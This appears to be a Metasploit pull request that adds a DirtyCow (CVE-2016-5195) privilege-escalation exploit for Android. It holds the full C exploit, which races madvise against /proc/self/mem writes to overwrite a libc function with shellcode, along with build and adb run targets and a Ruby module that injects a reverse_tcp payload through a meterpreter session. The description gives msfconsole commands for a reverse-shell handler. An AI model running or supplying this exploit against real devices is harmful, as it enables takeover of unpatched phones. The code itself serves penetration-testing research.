### PR TITLE
CVE-2016-5195 dirtycow for android

### DIFF
--- a/external/source/exploits/CVE-2016-5195/Android.mk
+++ b/external/source/exploits/CVE-2016-5195/Android.mk
@@ -1,0 +1,14 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_SRC_FILES := \
+  dirtycow.c
+
+LOCAL_MODULE := dirtycow
+LOCAL_LDFLAGS   += -llog
+LOCAL_CFLAGS    += -DDEBUG
+LOCAL_CFLAGS    += -pie -fPIE
+LOCAL_LDFLAGS   += -pie -fPIE
+
+include $(BUILD_EXECUTABLE)

--- a/external/source/exploits/CVE-2016-5195/Makefile
+++ b/external/source/exploits/CVE-2016-5195/Makefile
@@ -1,0 +1,19 @@
+
+all: install
+
+build:
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
+
+install: build
+	mv libs/armeabi/dirtycow ../../../../data/exploits/CVE-2016-5195.elf
+
+push: build
+	adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
+
+run: push
+	adb shell '/data/local/tmp/dirtycow "/system/lib/libc.so" capget'
+
+clean:
+	rm -rf libs
+	rm -rf obj
+

--- a/external/source/exploits/CVE-2016-5195/dirtycow.c
+++ b/external/source/exploits/CVE-2016-5195/dirtycow.c
@@ -1,0 +1,249 @@
+#include <err.h>
+#include <dlfcn.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <limits.h>
+#include <pthread.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/user.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+
+#ifdef DEBUG
+#include <android/log.h>
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#else
+#define LOGV(...) 
+#endif
+
+unsigned char shellcode_buf[256] = { 0x90, 0x90, 0x90, 0x90 };
+
+#define SHELLCODE shellcode_buf
+#define LOOP		0x100000
+#define CHECK		0x100
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 4096
+#endif
+
+struct mem_arg  {
+	off_t offset;
+	unsigned char *patch;
+	unsigned char *unpatch;
+	size_t patch_size;
+	int do_patch;
+
+	void *map;
+};
+
+static int check(struct mem_arg *mem_arg, const char *thread_name)
+{
+	unsigned char *check_patch = mem_arg->do_patch ? mem_arg->patch : mem_arg->unpatch;
+	if (*(unsigned char*)mem_arg->offset == *check_patch &&
+			*((unsigned char*)mem_arg->offset + mem_arg->patch_size) == *(check_patch + mem_arg->patch_size)) {
+		return 1;
+	}
+	return 0;
+}
+
+static void *madviseThread(void *arg)
+{
+	struct mem_arg *mem_arg;
+	size_t size;
+	void *addr;
+	int i, c = 0;
+
+	mem_arg = (struct mem_arg *)arg;
+	addr = (void *)(mem_arg->offset & (~(PAGE_SIZE - 1)));
+	/*size = mem_arg->offset - (unsigned long)addr;*/
+	size = mem_arg->patch_size + (mem_arg->offset - (unsigned long)addr);
+	LOGV("[*] madvise = %p %d", addr, size);
+
+	for(i = 0; i < LOOP; i++) {
+		c += madvise(addr, size, MADV_DONTNEED);
+		if (i % CHECK == 0 && check(mem_arg, __func__))
+			break;
+	}
+
+	LOGV("[*] madvise = %d", c);
+	return 0;
+}
+
+static void *procselfmemThread(void *arg)
+{
+	struct mem_arg *mem_arg;
+	int fd, i, c = 0;
+	unsigned char *p;
+
+	mem_arg = (struct mem_arg *)arg;
+	p = mem_arg->do_patch ? mem_arg->patch : mem_arg->unpatch;
+
+	fd = open("/proc/self/mem", O_RDWR);
+	if (fd == -1)
+		LOGV("open(\"/proc/self/mem\"");
+
+	/*void *newp = malloc(mem_arg->patch_size);*/
+	/*lseek(fd, mem_arg->offset, SEEK_SET);*/
+	/*read(fd, newp, mem_arg->patch_size);*/
+	/*hexdump(newp, 16);*/
+
+	for (i = 0; i < LOOP; i++) {
+		lseek(fd, mem_arg->offset, SEEK_SET);
+		c += write(fd, p, mem_arg->patch_size);
+
+		if (i % CHECK == 0 && check(mem_arg, __func__))
+			break;
+	}
+
+	LOGV("[*] /proc/self/mem %d", c);
+
+	close(fd);
+
+	return NULL;
+}
+
+static int get_range(const char * library, unsigned long *start, unsigned long *end)
+{
+	char line[4096];
+	FILE *fp;
+
+	fp = fopen("/proc/self/maps", "r");
+	if (fp == NULL)
+		LOGV("fopen(\"/proc/self/maps\")");
+
+	while (fgets(line, sizeof(line), fp) != NULL) {
+		if (strstr(line, library) == NULL)
+			continue;
+
+		if (strstr(line, "r-xp") == NULL)
+			continue;
+
+		*start = strtoul(line, NULL, 16);
+		*end = strtoul(line+9, NULL, 16);
+		fclose(fp);
+		return 0;
+	}
+
+	fclose(fp);
+
+	return -1;
+}
+
+static void exploit(struct mem_arg *mem_arg, int do_patch)
+{
+	pthread_t pth1, pth2;
+
+	LOGV("[*] exploit (%s)", do_patch ? "patch": "unpatch");
+	LOGV("[*] currently %p=%lx", (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
+
+	mem_arg->do_patch = do_patch;
+
+	pthread_create(&pth1, NULL, madviseThread, mem_arg);
+	pthread_create(&pth2, NULL, procselfmemThread, mem_arg);
+
+	pthread_join(pth1, NULL);
+	pthread_join(pth2, NULL);
+
+	LOGV("[*] exploited %p=%lx", (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
+}
+
+static unsigned long get_function_addr(const char * libname, const char * symbol)
+{
+	unsigned long addr;
+	void *handle;
+	const char *error;
+
+	dlerror();
+
+	handle = dlopen(libname, RTLD_LAZY);
+	if (handle == NULL) {
+		LOGV("%s", dlerror());
+		exit(EXIT_FAILURE);
+	}
+
+	addr = (unsigned long)dlsym(handle, symbol);
+	error = dlerror();
+	if (error != NULL) {
+		LOGV("%s", error);
+		exit(EXIT_FAILURE);
+	}
+
+	dlclose(handle);
+
+	return addr;
+}
+
+int main(int argc, char *argv[])
+{
+	if (argc < 2) {
+		LOGV("usage %s /system/lib/libc.so capget", argv[0]);
+		return 0;
+	}
+
+	const char* library = argv[1];
+	const char* function = argv[2];
+	const char* libname = strrchr(library, '/');
+	if (libname == 0) {
+		libname = library;
+	} else {
+		libname++;
+	}
+
+	unsigned long start, end;
+	unsigned long function_addr;
+	struct mem_arg mem_arg;
+	struct stat st;
+	pid_t pid;
+	int fd;
+
+	LOGV("[*] function: %s library: %s libname: %s", function, library, libname);
+
+	function_addr = get_function_addr(libname, function);
+
+	LOGV("[*] %s addr: %lx", function, function_addr);
+
+	int range = get_range(library, &start, &end);
+	if (range != 0) {
+		LOGV("failed to get range");
+	}
+
+	LOGV("[*] %s range: %lx-%lx", libname, start, end);
+
+	mem_arg.patch = malloc(sizeof(SHELLCODE)-1);
+	if (mem_arg.patch == NULL)
+		LOGV("malloc");
+
+	mem_arg.unpatch = malloc(sizeof(SHELLCODE)-1);
+	if (mem_arg.unpatch == NULL)
+		LOGV("malloc");
+
+	memcpy(mem_arg.unpatch, (void *)function_addr, sizeof(SHELLCODE)-1);
+	memcpy(mem_arg.patch, SHELLCODE, sizeof(SHELLCODE)-1);
+	mem_arg.patch_size = sizeof(SHELLCODE)-1;
+	mem_arg.do_patch = 1;
+
+	fd = open(library, O_RDONLY);
+	if (fd == -1)
+		LOGV("open(\" %s \")", library);
+	if (fstat(fd, &st) == -1)
+		LOGV("fstat");
+
+	mem_arg.map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
+	if (mem_arg.map == MAP_FAILED)
+		LOGV("mmap");
+	close(fd);
+
+	LOGV("[*] mmap %p", mem_arg.map);
+
+	mem_arg.offset = (off_t)((unsigned long)mem_arg.map + function_addr - start);
+
+	exploit(&mem_arg, 1);
+	exploit(&mem_arg, 0);
+
+	LOGV("function has been unpatched");
+	return 0;
+}

--- a/modules/exploits/android/local/dirtycow.rb
+++ b/modules/exploits/android/local/dirtycow.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info={})
     super( update_info( info, {
-        'Name'          => "Android dirtycow Exploit",
+        'Name'          => "Android DirtyCow Exploit",
         'Description'   => %q{
           A race condition was found in the way the Linux kernel's memory
           subsystem handled the copy-on-write (COW) breakage of private
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'References'    =>
         [
-          [ 'CVE', '2016-5915' ],
+          [ 'CVE', '2016-5195' ],
           [ 'URL', 'http://dirtycow.ninja/' ],
           [ 'URL', 'https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2' ],
         ],

--- a/modules/exploits/android/local/dirtycow.rb
+++ b/modules/exploits/android/local/dirtycow.rb
@@ -27,12 +27,14 @@ class MetasploitModule < Msf::Exploit::Local
         'License'       => MSF_LICENSE,
         'Author'        => [
           'Phil Oester',  # discovery
+          'scumjr',       # dirtycow-mem.c
           'timwr',        # metasploit module
         ],
         'References'    =>
         [
           [ 'CVE', '2016-5915' ],
           [ 'URL', 'http://dirtycow.ninja/' ],
+          [ 'URL', 'https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2' ],
         ],
         'DisclosureDate' => "Oct 20 2016",
         'SessionTypes'   => [ 'meterpreter' ],

--- a/modules/exploits/android/local/dirtycow.rb
+++ b/modules/exploits/android/local/dirtycow.rb
@@ -1,0 +1,77 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Common
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Android dirtycow Exploit",
+        'Description'   => %q{
+          A race condition was found in the way the Linux kernel's memory
+          subsystem handled the copy-on-write (COW) breakage of private
+          read-only memory mappings. An unprivileged local user could use
+          this flaw to gain write access to otherwise read-only memory mappings
+          and thus increase their privileges on the system.
+          The bug has existed since around Linux Kernel 2.6.22 (released in 2007).
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'Phil Oester',  # discovery
+          'timwr',        # metasploit module
+        ],
+        'References'    =>
+        [
+          [ 'CVE', '2016-5915' ],
+          [ 'URL', 'http://dirtycow.ninja/' ],
+        ],
+        'DisclosureDate' => "Oct 20 2016",
+        'SessionTypes'   => [ 'meterpreter' ],
+        "Platform"       => [ "android", "linux" ],
+        'Payload'        => { 'Space'    => 255 },
+        "Arch"           => ARCH_ARMLE,
+        'DefaultOptions' =>
+        {
+          'PAYLOAD'      => 'linux/armle/mettle/reverse_tcp',
+          'WfsDelay'     => 60,
+        },
+        'DefaultTarget' => 0,
+        'Targets'       => [ ['Automatic', { }]],
+    }))
+    register_options(
+      [
+        OptInt.new("ListenerTimeout", [ true, "The maximum number of seconds to wait for a session", 300]),
+        OptString.new("Library", [ true, "The library file to overwrite", "/system/lib/libc.so"]),
+        OptString.new("Function", [ true, "The library function to overwrite", "capget"]),
+      ], self.class)
+  end
+
+  def exploit
+    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-5195.elf" )
+    exploit_data = File.read(local_file, {:mode => 'rb'})
+    exploit_data.gsub!("\x90" * 4 + "\x00" * (payload_space - 4), payload.encoded)
+
+    workingdir = session.fs.dir.getwd
+    exploit_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
+    write_file(exploit_file, exploit_data)
+    cmd_exec("chmod 700 #{exploit_file}")
+
+    old_timeout = session.response_timeout
+    session.response_timeout = datastore['ListenerTimeout']
+    output = cmd_exec("#{exploit_file} #{datastore['Library']} #{datastore['Function']}")
+    session.response_timeout = old_timeout
+    print_status output
+    session.fs.file.rm(exploit_file)
+  end
+
+end
+


### PR DESCRIPTION
This change adds CVE-2016-5195 for Android. I've only tested it on a few phones but they all seem vulnerable. Unfortunately it seems to lock up the phones, but I'm hoping a different Library/Function (or even a new technique) can avoid this, which is why I'm putting it up for review.
## Verification
- [ ] Run `make` in external/source/exploits/CVE-2016-5195
- [ ] Get an android meterpreter session: `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost LHOST; set lport 4444; set ExitOnSession false; run -j`
- [ ] Run the exploit:

```
use exploit/android/local/dirtycow 
set LHOST LHOST
set LPORT 4446
set SESSION -1
set ExitOnSession false
run -j
```

You might have better luck if you run the handler separately and use DisablePayloadHandler true.

TODO:
- Update the description
- Stop it killing the phone :/
